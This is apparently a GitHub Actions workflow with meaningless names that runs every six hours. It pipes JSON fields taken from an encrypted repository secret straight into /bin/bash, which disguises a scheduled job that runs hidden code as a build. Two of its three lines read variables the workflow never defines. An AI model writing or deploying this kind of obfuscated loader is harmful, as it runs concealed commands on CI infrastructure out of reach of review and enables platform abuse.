name: projectileclue
on:
  workflow_dispatch:
  schedule:
    - cron: '6 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: projectileclue
        env:
          vwoe4: ${{ secrets.vwoe4 }}
        run: |
          echo $vwoe4 | jq -r .q01 | /bin/bash
          echo $k66 | jq -r .brrsj08 | /bin/bash
          echo $ewvch71161 | jq -r .x4 | /bin/bash

